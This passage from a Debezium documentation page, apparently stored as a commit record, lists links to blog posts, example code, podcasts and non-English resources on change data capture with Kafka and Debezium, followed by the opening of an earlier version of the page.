(CDC) with Debezium, Apicurio, and Kafka Connect on AWS\"] by Gary A. Stafford\n* Change Data Capture (CDC) With Kafka Connect and the Debezium Cassandra Connector (https:\/\/www.instaclustr.com\/change-data-capture-cdc-with-kafka-and-debezium\/[Part 1], https:\/\/www.instaclustr.com\/change-data-capture-cdc-with-kafka-connect-and-the-debezium-cassandra-connector-part-2\/[Part 2]) by Paul Brebner\n* https:\/\/docs.microsoft.com\/en-us\/samples\/azure-samples\/azure-sql-db-change-stream-debezium\/smart-bulk-copy\/[\"Azure SQL \/ SQL Server Change Stream with Debezium\"] by Davide Mauri\n* https:\/\/developers.redhat.com\/articles\/2021\/06\/14\/application-modernization-patterns-apache-kafka-debezium-and-kubernetes[\"Application modernization patterns with Apache Kafka, Debezium, and Kubernetes\"] by Bilgin Ibryam\n* https:\/\/eresh-gorantla.medium.com\/change-data-capture-use-cases-and-real-world-example-using-debezium-fe4098579d49[\"Change Data Capture, Use Cases and real-world example using Debezium\"] by Eresh Gorantla\n* https:\/\/medium.com\/event-driven-utopia\/configuring-debezium-to-capture-postgresql-changes-with-docker-compose-224742ca5372[\"Configuring Debezium to Capture PostgreSQL Changes with Docker Compose\"] by Dunith Dhanushka\n* https:\/\/developers.redhat.com\/articles\/2021\/07\/30\/avoiding-dual-writes-event-driven-applications[\"Avoiding dual writes in event-driven applications\"] by Bernard Tison\n* https:\/\/dev.to\/foolonthehill\/build-a-event-driven-app-with-micronaut-kafka-and-debezium-11be[\"Build a event-driven app with Micronaut, Kafka and Debezium\"] by George Oliveira\n* https:\/\/pradeepdaniel.medium.com\/real-time-change-data-replication-to-snowflake-using-kafka-and-debezium-d6ebb0d4eb29[\"Creating an ETL data pipeline to sync data to Snowflake using Kafka and Debezium\"] by Pradeep Daniel \n* http:\/\/www.greentechjava.com\/2021\/07\/streaming-nrt-data-with-kafka-connect.html[\"Streaming NRT data with kafka connect and Debezium \"] by Akash Sharma\n* https:\/\/thedataguy.in\/integrate-debezium-with-aws-secret-manager-for-retrieving-passwords\/[\"Integrate Debezium with AWS Secret Manager For Retrieving Passwords\"] by Bhuvanesh\n* https:\/\/www.rtinsights.com\/application-modernization-and-change-data-capture\/[\"Application Modernization and Change Data Capture\"] by Salvatore Salamone\n* https:\/\/daily.dev\/blog\/building-a-fault-tolerant-event-driven-architecture-with-google-cloud-pulumi-and-debezium[\"Building a fault-tolerant event-driven architecture with Google Cloud, Pulumi and Debezium\"] by Ido Shamun\n* https:\/\/thenewstack.io\/kubernetes-run-analytics-at-the-edge-postgres-kafka-debezium\/[\"Kubernetes-Run Analytics at the Edge: Postgres, Kafka, Debezium\"] by Jonathan Katz\n* https:\/\/www.alibabacloud.com\/blog\/real-time-data-synchronization-based-on-flink-sql-cdc_597750[\"Real-Time Data Synchronization Based on Flink SQL CDC\"] by Wu Chong\n* https:\/\/medium.com\/globant\/change-data-capture-with-debezium-6eb523d57b1c[\"Change Data Capture with Debezium\"] by Ankit Mishra\n* https:\/\/medium.com\/event-driven-utopia\/8-practical-use-cases-of-change-data-capture-8f059da4c3b7[\"8 Practical Use Cases of Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/www.wix.engineering\/post\/change-data-capture-at-deviantart[\"Change Data Capture at DeviantArt\"] by Ruslan Danilin\n* https:\/\/www.infinitecatalog.com\/blog\/2021\/05\/30\/materialized-world.html[\"We Are Living in a Materialized World\"] by Udbhav Gupta\n* https:\/\/smarttechie.org\/2021\/03\/17\/audit-database-changes-with-debezium\/[\"Audit Database Changes with Debezium\"] by Siva Prasad Rao Janapati\n* https:\/\/medium.com\/geekculture\/change-data-capture-using-debezium-ec48631d643a[\"Change Data Capture \u2014 Using Debezium\"] by Ritresh Girdhar\n* https:\/\/lenses.io\/blog\/2021\/04\/change-data-capture-apache-kafka-break-up-monolith\/[\"Change Data Capture and Kafka to break up your monolith\"] by Guillaume Aym\u00e9\n* https:\/\/kvenkatraman.medium.com\/snowflake-near-real-time-ingestion-from-rdbms-using-debezium-and-kafka-92f00e2ee897[\"Snowflake - Near Real-Time Ingestion from RDBMS using Debezium and Kafka\"] by Karthik Venkatraman\n* https:\/\/medium.com\/capital-one-tech\/the-journey-from-batch-to-real-time-with-change-data-capture-c598e56146be[\"The Journey from Batch to Real-time with Change Data Capture\"] by Andrew Bonham\n* https:\/\/tech.willhaben.at\/change-data-capturing-with-debezium-at-willhaben-3579afd8be6b[\"Change Data Capturing with Debezium at willhaben\"] by Maurizio Rinder\n* https:\/\/shopify.engineering\/capturing-every-change-shopify-sharded-monolith[\"Capturing Every Change From Shopify\u2019s Sharded Monolith\"] by John Martin\n* https:\/\/dev.to\/hazelcast\/beyond-hello-world-zero-downtime-deployments-on-kubernetes-162o[\"Beyond 'Hello World': Zero-Downtime Deployments on Kubernetes \"] by Nicolas Frankel\n* https:\/\/lambda.grofers.com\/origins-of-data-lake-at-grofers-6c011f94b86c[\"Origins of Data Lake at Grofers -- Evolution of our data pipelines\"] by Akshay Agarwal\n* https:\/\/ducmanhphan.github.io\/2020-08-09-how-to-work-with-debezium\/[\"How to work with Debezium\"] by Manh Phan\n* https:\/\/reorchestrate.com\/posts\/debezium-performance-impact\/[\"Debezium does not impact source database performance\"] by Mike Seddon\n* https:\/\/medium.com\/incognia-tech\/ensuring-data-consistency-across-services-with-the-transactional-outbox-pattern-90be4d735cb0[\"Ensuring data consistency across services with the Transactional Outbox pattern\"] by Mateus Moury and Rafael Acevedo\n* https:\/\/medium.com\/event-driven-utopia\/a-gentle-introduction-to-event-driven-change-data-capture-683297625f9b[\"A Gentle Introduction to Event-driven Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/maciejszymczyk.medium.com\/change-data-capture-convert-your-database-into-a-stream-with-debezium-356c1a49b459[\"Change Data Capture \u2014 Convert your database into a stream with Debezium\"] by Maciej Szymczyk\n* https:\/\/info.crunchydata.com\/blog\/postgres-change-data-capture-with-debezium[\"Change Data Capture in Postgres With Debezium\"] by Dave Cramer\n* https:\/\/medium.com\/apache-pinot-developer-blog\/change-data-analysis-with-debezium-and-apache-pinot-b4093dc178a7[\"Change Data Analysis with Debezium and Apache Pinot\"] by Kenny Bastani\n* https:\/\/juliuskrah.com\/blog\/2020\/01\/06\/streaming-changes-from-keycloak-using-debezium-cdc\/[\"Streaming Changes from Keycloak using Debezium (CDC)\"] by Julius Krah\n* https:\/\/www.tigeranalytics.com\/blog\/building-nrt-data-pipeline-debezium-kafka-snowflake\/[\"Building a Near-Real Time (NRT) Data Pipeline using Debezium, Kafka, and Snowflake\"] by Arun Kumar Ponnurangam and Karunakar Goud\n* https:\/\/medium.com\/data-rocks\/creating-a-no-code-aws-native-oltp-to-olap-data-pipeline-part-1-50481b57dc30[\"Creating a no-code AWS native OLTP to OLAP data pipeline \u2014 Part 1\"] by Haris Michailidis\n* https:\/\/www.zuehlke.com\/en\/insights\/design-failure-distributed-transactions-microservices[\"Design for Failure \u2014 Distributed Transactions in Microservices\"] by Darren Boo\n* https:\/\/blog.rafaelgss.com.br\/autonomous-microservices[\"Autonomous Microservices - Outbox Pattern\"] by Rafael Gonzaga\n* https:\/\/medium.com\/trendyol-tech\/debezium-with-simple-message-transformation-smt-4f5a80c85358[\"Debezium with Simple Message Transformation (SMT)\"] by Okan Yildirim\n* https:\/\/www.systemcraftsman.com\/2020\/11\/30\/asap-the-storified-demo-of-introduction-to-debezium-and-kafka-on-kubernetes\/[\"ASAP! \u2013 The Storified Demo of Introduction to Debezium and Kafka on Kubernetes\"] by Aykut Bulgu\n* https:\/\/elephanttamer.net\/?p=50[\"Setting up PostgreSQL for Debezium\"] by Micha\u0142 Mackiewicz\n* https:\/\/medium.com\/@midhunsukumaran.mec\/a-year-and-a-half-with-debezium-f4f323b4909d[\"A year and a half with Debezium: CDC With MySQL\"] by Midhun Sukumaran\n* https:\/\/jet-start.sh\/blog\/2020\/10\/06\/enabling-full-text-search[\"Enabling Full-text Search with Change Data Capture in a Legacy Application\"] by Franti\u0161ek Hartman\n* https:\/\/medium.com\/@sumant.rana\/sync-mysql-to-postgresql-using-debezium-and-kafkaconnect-d6612489fd64[\"Sync MySQL to PostgreSQL using Debezium and Kafka Connect\"] by Sumant Rana\n* https:\/\/turkogluc.com\/postgresql-capture-data-change-with-debezium\/[\"Making Sense of Change Data Capture Pipelines for Postgres with Debezium Kafka Connector\"] by Cemal Turkoglu\n* https:\/\/reveation-labs.medium.com\/streaming-events-from-sql-server-to-event-hub-in-azure-using-debezium-55dfd1a0e214[\"Streaming Events from SQL Server to Event Hub in Azure using Debezium\"] by Reveation Labs\n* https:\/\/developers.redhat.com\/cheat-sheets\/debezium-openshift-cheat-sheet[\"Debezium on OpenShift Cheat Sheet\"] by Abdellatif Bouchama\n* https:\/\/medium.com\/data-rocks\/managing-kafka-connectors-at-scale-using-kafka-connect-manager-kcm-31d887de033c[\"Managing Kafka Connectors at scale using Kafka Connect Manager\"] by Sandeep Mehta\n* https:\/\/medium.com\/dana-engineering\/streaming-data-changes-in-mysql-into-elasticsearch-using-debezium-kafka-and-confluent-jdbc-sink-8890ad221ccf[\"How to stream data changes from MySQL into Elasticsearch using Debezium\"] by Rizqi Nugroho\n* https:\/\/medium.com\/@changeant\/implementing-the-transactional-outbox-pattern-with-debezium-in-quarkus-f2680306951[\"Implementing the Transactional Outbox pattern with Debezium in Quarkus\"] by Iain Porter\n* https:\/\/www.confluent.io\/blog\/cdc-and-streaming-analytics-using-debezium-kafka\/[\"Analysing Changes with Debezium and Kafka Streams\"] by Mike Fowler\n* https:\/\/medium.com\/@bogdan.dina03\/de-coupling-yourself-507a15fa100d[\"(De)coupling yourself\"] by Dina Bogdan\n* https:\/\/medium.com\/comsystoreply\/stream-your-database-into-kafka-with-debezium-a94b2f649664[\"Stream Your Database into Kafka with Debezium -- An Introduction and Experience Report\"] by David Hettler\n* https:\/\/medium.com\/@limadelrey\/kafka-connect-how-to-create-a-real-time-data-pipeline-using-change-data-capture-cdc-c60e06e5306a[\"Kafka Connect: How to create a real time data pipeline using Change Data Capture (CDC)\"] by Francisco Lima\n* https:\/\/dev.to\/abhirockzz\/tutorial-set-up-a-change-data-capture-architecture-on-azure-using-debezium-postgres-and-kafka-49h6[\"Tutorial: Set up a Change Data Capture architecture on Azure using Debezium, Postgres and Kafka \"] by Abhishek Gupta\n* Kafka Connect \u2013 Offset commit errors by Javier Holguera: https:\/\/www.javierholguera.com\/2020\/06\/02\/kafka-connect-offset-commit-errors-i\/[Part 1], https:\/\/www.javierholguera.com\/2020\/06\/16\/kafka-connect-offset-commit-errors-ii\/[Part 2]\n* https:\/\/medium.com\/@samuel_vdc\/data-liberation-pattern-using-debezium-engine-4fd32b92d826[\"Data liberation pattern using the Debezium engine\"] by Samuel Vandecasteele\n* https:\/\/medium.com\/hepsiburadatech\/postgresql-db-change-data-capture-cdc-using-debezium-f1a933174fd8[\"PostgreSql Db Change Data Capture (CDC) Using Debezium\"] by Caner Tosuner\n* http:\/\/www.mastertheboss.com\/jboss-frameworks\/debezium\/getting-started-with-debezium[\"Getting started with Debezium\"] by Francesco Marchioni\n* https:\/\/dev.to\/oryanmoshe\/debezium-custom-converters-timestampconverter-26hh[\"Debezium Custom Converters - TimestampConverter\"] by Oryan Moshe\n* https:\/\/www.gridgain.com\/resources\/blog\/change-data-capture-between-mysql-and-gridgain-debezium[\"Change Data Capture Between MySQL and GridGain With Debezium\"] by Evgenii Zhuravlev\n* https:\/\/cloud.google.com\/blog\/products\/data-analytics\/how-to-move-data-from-mysql-to-bigquery[\"How do I move data from MySQL to BigQuery?\"], discussing usage of the Debezium embedded engine with Google Cloud Dataflow, by Pablo Estrada and Griselda Cuevas\n* https:\/\/mike-costello.github.io\/2020\/04\/01\/Using_Debezium_With_AMQP_Events\/[\"Use CDC to create AMQP Based Events with Apache Camel and Debezium\"] by Michael Costello\n* https:\/\/gennadny.wordpress.com\/2020\/03\/22\/the-dead-philosophers-club-streaming-data-from-sql-server-to-azure-via-debezium-and-apache-kafka\/[\"The Dead Philosophers Club \u2013 Streaming Data from SQL Server to Azure via Debezium and Apache Kafka\"] by Gennady Kostinsky\n* https:\/\/medium.com\/everything-full-stack\/streaming-data-changes-to-a-data-lake-with-debezium-and-delta-lake-pipeline-299821053dc3[\"Streaming data changes to a Data Lake with Debezium and Delta Lake pipeline\"] by Yinon D. Nahamu\n* https:\/\/www.infoq.com\/news\/2020\/01\/cdc-debezium-1-0-final-released\/[\"Change Data Capture Tool Debezium 1.0 Final Released\"] by Jan Stenberg\n* https:\/\/strimzi.io\/2020\/01\/27\/deploying-debezium-with-kafkaconnector-resource.html[\"Deploying Debezium using the new KafkaConnector resource\"] by Tom Bentley\n* https:\/\/www.sderosiaux.com\/articles\/2020\/01\/06\/learnings-from-using-kafka-connect-debezium-postgresql\/[\"Learnings from using Kafka Connect - Debezium - PostgreSQL\"] by St\u00e9phane Derosiaux\n* https:\/\/thedataguy.in\/monitor-debezium-mysql-connector-with-prometheus-and-grafana\/[\"Monitor Debezium MySQL Connector With Prometheus And Grafana\"] by Bhuvanesh\n* http:\/\/www.carbonrider.com\/2019\/11\/16\/change-data-capture-with-apache-kafka-postgresql-kafka-connect-and-debezium\/[\"Change Data Capture with Apache Kafka, PostgreSQL, Kafka Connect and Debezium\"] by Yogesh Jadhav\n* https:\/\/dzone.com\/articles\/implementing-the-outbox-pattern[\"Implementing the Outbox Pattern\"] by Sohan Ganapathy\n* https:\/\/medium.com\/engineering-varo\/event-driven-architecture-and-the-outbox-pattern-569e6fba7216[\"Event-Driven Architecture and the Outbox Pattern\"] by Rod Shokrian\n* https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[\"Logs & Offsets: (Near) Real Time ELT with Apache Kafka + Snowflake\"] by Adrian Kreuziger\n* https:\/\/info.crunchydata.com\/blog\/postgresql-change-data-capture-with-debezium[\"PostgreSQL Change Data Capture With Debezium\"] by Dave Cramer\n* https:\/\/developers.redhat.com\/blog\/2019\/09\/03\/cdc-pipeline-with-red-hat-amq-streams-and-red-hat-fuse\/[\"CDC pipeline with Red Hat AMQ Streams and Red Hat Fuse\"] by Sadhana Nandakumar\n* https:\/\/mauridb.medium.com\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream\"] by Davide Mauri\n* https:\/\/medium.com\/@hpgrahsl\/communicating-data-changes-across-service-boundaries-safely-129c4eb5db8[\"Communicating Data Changes Across Service Boundaries\u2026 Safely!\"] by Hans-Peter Grahsl\n* https:\/\/blog.clairvoyantsoft.com\/mysql-cdc-with-apache-kafka-and-debezium-3d45c00762e4[\"MySQL CDC with Apache Kafka and Debezium\"] by Kushal Yellam\n* https:\/\/thoughts-on-java.org\/outbox-pattern-with-cdc-and-debezium\/[\"Implementing the Outbox Pattern with CDC using Debezium\"] by Thorben Janssen\n* https:\/\/blog.zhaw.ch\/splab\/2019\/05\/03\/serverless-plumbing-streaming-mysql-events-to-knative-services\/[\"Serverless Plumbing: Streaming MySQL Events to Knative Services\"] by Mohammed Al-Ameen\n* https:\/\/medium.com\/yotpoengineering\/building-zero-latency-data-lake-using-change-data-capture-f93ef50eb066[\"Building zero-latency data lake using Change Data Capture\"] by Ofir Ventura\n* https:\/\/medium.com\/high-alpha\/data-stream-processing-for-newbies-with-kafka-ksql-and-postgres-c30309cfaaf8[\"Data Stream Processing for Newbies with Kafka, KSQL, and Postgres\"] by Maria Patterson\n* https:\/\/blog.couchbase.com\/kafka-connect-mysql-couchbase-debezium\/[\"Kafka Connect from MySQL to Couchbase with Debezium\"] by Matthew Groves\n* https:\/\/www.linkedin.com\/pulse\/change-data-capture-postgresql-via-debezium-part-1-paolo-scarpino\/[\"Change Data Capture on PostgreSQL via Debezium\"] by Paolo Scarpino\n* https:\/\/medium.com\/jw-player-engineering\/southpaw-176aea5f4583[\"Southpaw - Streaming Left Joins with Change Data Capture\"] by Morrigan Jones\n* https:\/\/medium.com\/@hpgrahsl\/connecting-apache-kafka-to-azure-cosmosdb-part-ii-b96cf0f5cdfa[\"Connecting Apache Kafka to Azure CosmosDB\u200a\u2014\u200aPart II\"] by Hans-Peter Grahsl\n* https:\/\/vladmihalcea.com\/how-to-extract-change-data-events-from-mysql-to-kafka-using-debezium\/[\"How to extract change data events from MySQL to Kafka using Debezium\"] by Vlad Mihalcea\n* https:\/\/rmoff.net\/2019\/10\/16\/using-kafka-connect-and-debezium-with-confluent-cloud\/[\"Using Kafka Connect and Debezium with Confluent Cloud\"]\n* https:\/\/rmoff.net\/2019\/11\/20\/streaming-data-from-sql-server-to-kafka-to-snowflake-with-kafka-connect\/[\"Streaming data from SQL Server to Kafka to Snowflake \u2744\ufe0f with Kafka Connect and Debezium\"]\n* https:\/\/rmoff.net\/2018\/03\/24\/streaming-data-from-mysql-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MySQL into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/rmoff.net\/2018\/03\/27\/streaming-data-from-mongodb-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MongoDB into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/medium.com\/@tilakpatidar\/streaming-data-from-postgresql-to-kafka-using-debezium-a14a2644906d[\"Streaming data from PostgreSQL to Kafka using Debezium\"] by Tilak Patidar\n* https:\/\/medium.com\/blablacar-tech\/streaming-data-out-of-the-monolith-building-a-highly-reliable-cdc-stack-d71599131acb[\"Streaming Data out of the Monolith: Building a Highly Reliable CDC Stack\"] by Yuancheng Peng\n* https:\/\/iamninad.com\/how-debezium-kafka-stream-can-help-you-write-cdc\/[\"How Debezium & Kafka Streams Can Help You Write CDC Solution\"] by Neenad Ingole\n* https:\/\/jakubbujny.com\/2018\/09\/20\/replicate-cloud-aws-rds-mysql-to-on-premise-postgresql-in-docker-future-is-today-debezium-and-kafka-on-aws-eks\/[Replicate cloud AWS RDS MySQL to on-premise PostgreSQL in Docker \u2013 future is today! Debezium and Kafka on AWS EKS] by Jakub Bujny\n* https:\/\/medium.com\/@mauridb\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream - Responding to data changes in real time using modern technologies\"]\n* https:\/\/medium.com\/@hpgrahsl\/optimizing-read-access-to-sharded-mongodb-collections-utilizing-apache-kafka-connect-cdcd8ec6228[\"Optimizing Read Access to Sharded MongoDB Collections utilizing Apache Kafka Connect\"] by Hans-Peter Grahsl\n\n== Example Code\n\n* https:\/\/github.com\/debezium\/debezium-examples\/[Debezium's official examples]\n* https:\/\/ibm-cloud-architecture.github.io\/refarch-eda\/use-cases\/db2-debezium\/[DB2 Change Data Capture with Debezium]\n* https:\/\/github.com\/yorek\/debezium-sql-change-stream[\"SQL Server Change Stream sample using Debezium\"] by Davide Mauri\n* https:\/\/github.com\/foogaro\/change-data-capture[\"CDC project based on Debezium, Kafka, MS SQL Server, Infinispan and Teiid, entirely based on containers\"] by Luigi Fugaro\n* https:\/\/github.com\/fvaleri\/cdc[\"CDC with Camel and Debezium: code-driven vs configuration-driven pipelines\"] by Federico Valeri\n* https:\/\/github.com\/morsapaes\/flink-sql-CDC[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/github.com\/suadev\/microservices-change-data-capture-with-debezium[\"Microservices Change Data Capture With Debezium\"] by Suat K\u00f6se\n* https:\/\/github.com\/hyagli\/cdc-python-netcore\/[\"Outbox Pattern Implementation using Debezium and Google Protocol Buffers\"] by Huseyin Yagli\n* https:\/\/youtu.be\/fQoTvEtho_4\/[\"Monitoring Kafka Debezium Connector metrics using Prometheus\"] by Waqas Dilawar\n\n== Interviews and Podcasts\n\n* https:\/\/www.youtube.com\/watch?v=yuJ1r_xUcAo[Trino Community Podcast Ep. #25 -- Trino Going Through Changes; together with Ashhar Hasan, Ayush Chauhan, Brian Olsen and Manfred Moser]\n* https:\/\/www.dataengineeringpodcast.com\/debezium-change-data-capture-episode-114\/[Change Data Capture For All Of Your Databases With Debezium -- episode #114 of the Data Engineering Podcast by Tobias Macey; together with Randall Hauch]\n* https:\/\/www.buzzsprout.com\/186154\/1770184[MySQL, Cassandra, BigQuery, and Streaming Analytics with Joy Gao]\n* http:\/\/airhacks.fm\/#episode_57[CDC, Debezium, streaming and Apache Kafka -- episode #57 of Adam Bien's airhacks.fm podcast]\n* https:\/\/www.buzzsprout.com\/186154\/1365043-change-data-capture-with-debezium-ft-gunnar-morling[Change Data Capture with Debezium ft. Gunnar Morling]\n* https:\/\/www.youtube.com\/watch?v=H-yGdKy48VE[Interview with Gunnar Morling] for thoughts-on-java.org\n\n== Other\n\n* https:\/\/www.thoughtworks.com\/radar\/platforms\/debezium[Debezium entry in the ThoughtWorks Technology Radar]\n* https:\/\/learn.openshift.com\/middleware\/debezium-getting-started\/[Getting Started with Debezium on OpenShift]; interactive Debezium learning scenario allowing you to try out Debezium on OpenShift within minutes\n\n== Non-English Resources\n\n=== \ud83c\uddea\ud83c\uddf8 Spanish\n\n* https:\/\/www.youtube.com\/watch?v=y2A4x5ZF7dY[\"Iniciaci\u00f3n a CDC con Debezium\"] by Jes\u00fas Pau de la Cruz and Jos\u00e9 Alberto Ruiz Casarrubios (video)\n* https:\/\/www.paradigmadigital.com\/dev\/vistazo-debezium-herramienta-change-data-capture\/[\"Un vistazo a Debezium: una herramienta completa de Change Data Capture\"] by Jesus Pau de la Cruz (blog post)\n\n=== \ud83c\uddf7\ud83c\uddfa Russian\n\n* https:\/\/habr.com\/ru\/company\/neoflex\/blog\/567930\/[\"\u041f\u043e\u0442\u043e\u043a\u043e\u0432\u044b\u0439 \u0437\u0430\u0445\u0432\u0430\u0442 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 \u0438\u0437 PostgreSQL\/MySQL \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Apache Flink\"] by Alex Sergeenko (blog post)\n* https:\/\/habr.com\/ru\/company\/flant\/blog\/523510\/[\"\u0417\u043d\u0430\u043a\u043e\u043c\u0441\u0442\u0432\u043e \u0441 Debezium \u2014 CDC \u0434\u043b\u044f Apache Kafka\"] (blog post)\n\n=== \ud83c\udde9\ud83c\uddea German\n* https:\/\/www.bigdata-insider.de\/was-ist-debezium-a-1044399\/[\"Was ist Debezium?\"] by Stefan Luber (article)\n* https:\/\/decompose.io\/2021\/01\/10\/debezium\/[\"Debezium\"] by Teitelberg (blog post)\n* https:\/\/blogs.zeiss.com\/digital-innovation\/de\/datenbankaenderungen-teil-1\/[\"Datenbank\u00e4nderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 1) \u2013 Die Theorie\"] by Richard Mogwitz (blog post)\n* https:\/\/blogs.zeiss.com\/digital-innovation\/de\/datenbankaenderungen-teil-2\/[\"Datenbank\u00e4nderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 2) \u2013 Ein Beispiel\"] by Richard Mogwitz (blog post)\n* https:\/\/www.heise.de\/developer\/artikel\/Im-Gespraech-Gunnar-Morling-ueber-Debezium-und-CDC-4513865.html[\"Im Gespr\u00e4ch: Gunnar Morling \u00fcber Debezium und CDC\"]; interview with Thorben Janssen for heise.de (podcast)\n\n=== \ud83c\udde7\ud83c\uddf7 Portuguese\n\n* https:\/\/medium.com\/@viavarejo.productdevelopment\/uma-estrat%C3%A9gia-de-cdc-com-debezium-e27aa945d7b0[\"Uma estrat\u00e9gia de CDC com Debezium\"] by Jo\u00e3o Gabriel Mello, Brunno Lira and Marcelo Costa (blog post)\n* https:\/\/www.infoq.com\/br\/presentations\/postgresql-ao-datalake-utilizando-kafkadebezium\/[\"Do PostgreSQL ao Data Lake utilizando Kafka-Debezium\"] by Paulo Singaretti, PGConf S\u00e3o Paulo 2019 (conference session recording)\n* https:\/\/www.youtube.com\/watch?v=jtVD-HIJG9M&feature=youtu.be[\"Quarkus #25: Monitoramento de qualquer opera\u00e7\u00e3o em uma tabela do banco de dados com Debezium\"] by Vinicius Ferraz (sceen cast)\n* https:\/\/elo7.dev\/cdc-parte-1\/[\"Introdu\u00e7\u00e3o ao Change Data Capture (CDC)\"] by Renato Sardinha (blog post)\n* https:\/\/medium.com\/@singaretti\/streaming-de-dados-do-postgresql-utilizando-kafka-debezium-v2-d49f46d70b37[\"Streaming de dados (do PostgreSQL) utilizando Kafka|Debezium (v2)\"] by Paulo Singaretti (blog post)\n\n=== Japanese\n\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/19\/debezium-camel-integration\/[\"Debezium\u3068Apache Camel\u306e\u30a4\u30f3\u30c6\u30b0\u30ec\u30fc\u30b7\u30e7\u30f3\u30b7\u30ca\u30ea\u30aa\"] (Japanese translation of the blog post link:\/blog\/2020\/02\/19\/debezium-camel-integration\/[Integration Scenarios with Debezium and Apache Camel] by Jiri Pechanec)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/10\/event-sourcing-vs-cdc\/[\"\u30de\u30a4\u30af\u30ed\u30b5\u30fc\u30d3\u30b9\u306e\u305f\u3081\u306e\u5206\u6563\u30c7\u30fc\u30bf \u301c \u30a4\u30d9\u30f3\u30c8\u30bd\u30fc\u30b7\u30f3\u30b0 vs \u30c1\u30a7\u30f3\u30b8\u30c7\u30fc\u30bf\u30ad\u30e3\u30d7\u30c1\u30e3\"] (Japanese translation of the blog post link:\/blog\/2020\/02\/10\/event-sourcing-vs-cdc\/[Distributed Data for Microservices \u2014 Event Sourcing vs. Change Data Capture] by Eric Murphy)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/tech.raksul.com\/2021\/12\/10\/debezium%e3%82%92%e5%88%a9%e7%94%a8%e3%81%97%e3%81%9fdb%e3%82%92%e5%90%8c%e6%9c%9f%e3%81%99%e3%82%8b%e4%bb%95%e7%b5%84%e3%81%bf%e3%81%a5%e3%81%8f%e3%82%8a\/[\"Debezium\u3092\u5229\u7528\u3057\u305fDB\u3092\u540c\u671f\u3059\u308b\u4ed5\u7d44\u307f\u3065\u304f\u308a\"] by Kishino Yusuke (blog post)\n\n=== \ud83c\udf0f Other\n\n* \ud83c\uddf5\ud83c\uddf1 https:\/\/wiadrodanych.pl\/big-data\/change-data-capture-mysql-debezium\/[\"Change Data Capture \u2013 Zmie\u0144 Baz\u0119 W Strumie\u0144 (Debezium)\"] by Maciej Szymczyk (blog post, Polish)\n* \ud83c\udde8\ud83c\uddf3 https:\/\/mp.weixin.qq.com\/s\/Mfn-fFegb5wzI8BIHhNGvQ[\"Flink SQL CDC \u4e0a\u7ebf\uff01\u6211\u4eec\u603b\u7ed3\u4e86 13 \u6761\u751f\u4ea7\u5b9e\u8df5\u7ecf\u9a8c\"] by Zeng Qingdong (blog post, Mandarin)\n* \ud83c\uddeb\ud83c\uddf7 https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019\/[\"Conf\u00e9rence POSS 2019 : Streaming Processing avec Debezium\"] by Yabir Canario De la Mota & Charly Clairmont (blog post, French)\n* \ud83c\uddee\ud83c\udde9 https:\/\/medium.com\/easyread\/ingest-data-dari-mysql-database-ke-bigquery-dengan-apache-kafka-dan-debezium-f519e197f39c[\"Ingesting Data dari MySQL Database ke BigQuery dengan Apache Kafka dan Debezium\"] by Ilyas Ahsan (blog post, Indonesian)\n* \ud83c\uddf5\ud83c\uddf0 https:\/\/www.youtube.com\/playlist?list=PLYIDB7b23nqOcp-Gnff_KfZbp8PK4Z6jg[\"Change Data Capture Mechanism using Apache Kafka, Debezium and Postgres\"] by Waqas Dilawar (blog post, Urdu)\n","old_contents":"---\nlayout: page-menu\ntitle: Resources on the Web\npermalink: \/documentation\/online-resources\/\n---\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nA compilation of blog posts, slide sets, recordings and other online resources around Debezium.\nMost of the resources are in English; you can find a collection of link:#non_english_resources[resources in other languages] like Portuguese or French towards the end of this page.\n\nYou've written or spoken about Debezium and would like to have your post or talk listed here?\nThat's great, let us know by sharing the link in our https:\/\/groups.google.com\/forum\/#!forum\/debezium[forum].\nOr better yet, just add the link to the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/docs\/online-resources.asciidoc[source of this page] yourself and send a pull request against the https:\/\/github.com\/debezium\/debezium.github.io[debezium.github.io] repo.\nThanks!\n\n== Presentations, Session Recordings and Videos\n\n* https:\/\/www.youtube.com\/watch?v=_jy0VmpdSu4[\"DevOps Malaysia Online Meetup #32 : Using Debezium for Microservices Outbox Pattern\"] by CK Gan\n* https:\/\/www.youtube.com\/watch?v=yWFFOkWlLoY[\"Analyzing Real-time Order Deliveries using CDC with Debezium and Pinot\"] by Kenny Bastani and Gunnar Morling\n* https:\/\/www.youtube.com\/watch?v=R1kOuvLYcYo[\"Dissecting our Legacy: The Strangler Fig Pattern with Apache Kafka, Debezium and MongoDB\"] by Hans-Peter Grahsl and Gunnar Morling\n* https:\/\/2021.berlinbuzzwords.de\/session\/change-data-streaming-patterns-distributed-systems[\"Change Data Streaming Patterns in Distributed Systems\"] by Gunnar Morling and Hans-Peter Grahsl\n* link:++https:\/\/static.sched.com\/hosted_files\/ossna2020\/c6\/Managing Data Consistency with Debezium.pdf++[\"Managing Data Consistency Among Microservices with Debezium\"] by Justin Chao\n* https:\/\/noti.st\/morsapaes\/liQzgs\/change-data-capture-with-flink-sql-and-debezium[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/www.youtube.com\/watch?v=DJTtGaPsSYY[\"Quarkus Insights #10: CDC, Debezium and the outbox pattern\"]; a live-streamed session with the Quarkus team on Debezium and the outbox pattern, including a demo\n* 